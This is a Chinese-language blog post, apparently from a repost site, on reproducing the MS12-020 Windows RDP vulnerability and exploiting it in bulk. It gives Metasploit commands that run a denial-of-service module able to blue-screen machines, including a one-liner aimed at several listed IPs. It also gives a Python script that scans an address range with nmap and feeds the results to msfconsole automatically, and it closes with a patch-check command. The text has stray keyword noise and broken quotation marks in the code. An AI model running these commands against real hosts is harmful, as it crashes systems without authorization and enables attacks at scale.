MS12-020漏洞復現及自動化批量利用
阿新 • • 發佈:2018-08-24
.com 端口 cidr odi ref class create 藍屏 can 漏洞描述
Windows 遠程桌面協議漏洞,可執行代碼,POC可導致藍屏。(RDP遠程桌面執行代碼漏洞)
影響目標
Windows XP sp3
Windows xp sp2
Windows Vista sp2
Windows 7
Windows Server 2003
Windows Server 2008
Windows Server 2008 R2
msfpayload利用
msfconsole
use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
set rhost <ip>
run
此pyload僅支持單目標。
通過msfconsole快速啟動
msfconsole -x "use auxiliary/dos/windows/rdp/ms12_020_maxchannelids;set rhost 10.129.10.10;run;set rhost 10.129.10.37;run;set rhost 10.129.10.169;run;set rhost 10.129.10.209;run;set rhost 10.129.10.232;run;"
通過bash腳本批量生成檢測腳本(nmap-port2ip.py)
#encoding:utf-8 import xml.sax import sys import os class MovieHandler( xml.sax.ContentHandler ): def __init__(self, filterport=None): self.CurrentData = "" self.port=filterport self.data = "" self.datas=[] # 元素開始事件處理 def startElement(self, tag, attributes): self.CurrentData = tag if tag == "address": self.data=attributes["addr"] # 元素結束事件處理 def endElement(self, tag): if self.CurrentData == "address": self.datas.append(self.data) self.data="" self.CurrentData = "" class Gather(object): def __init__(self, filterport=None): # 創建一個 XMLReader self.parser = xml.sax.make_parser() # turn off namepsaces self.parser.setFeature(xml.sax.handler.feature_namespaces, 0) # 重寫 ContextHandler self.Handler = MovieHandler(filterport) self.parser.setContentHandler( self.Handler ) def run(self, port): self.Handler.datas=[] self.parser.parse(port+".xml") print(self.Handler.datas) def get_ans(self): return self.Handler.datas if __name__ == "__main__": if len(sys.argv) !=3: os.exit() os.system("nmap "+sys.argv[1]+" -p "+sys.argv[2]+" --open -oX "+sys.argv[2]+".xml") g = Gather() g.run(sys.argv[2]) # create cmd cmd = ‘"use auxiliary/scanner/rdp/ms12_020_check;set threads 20;‘ ips = g.get_ans() if len(ips)>0: for ip in g.get_ans(): cmd += "set rhosts "+ip+";run;" cmd += ‘exit;"‘ os.system("msfconsole -x " + cmd) # 使用方法 python nmap-port2ip.py <ip> <port> # 功能:針對某種服務的漏洞對指定IP段的所有主機進行檢測,獲取可能存在問題的主機IP,並調用對應的Msf Payload進行利用嘗試。 # ip可支持單一IP、CIDR形式IP、10.129.1.1-154等幾種,格式與nmap一致 # port僅支持單端口
漏洞補丁檢測
systeminfo | find /i "KB2621440"
如果存在結果如下,證明已打補丁,否則,需要打對應的補丁。
Windows Server 2003補丁
參考文章
- 微軟MS12-020
MS12-020漏洞復現及自動化批量利用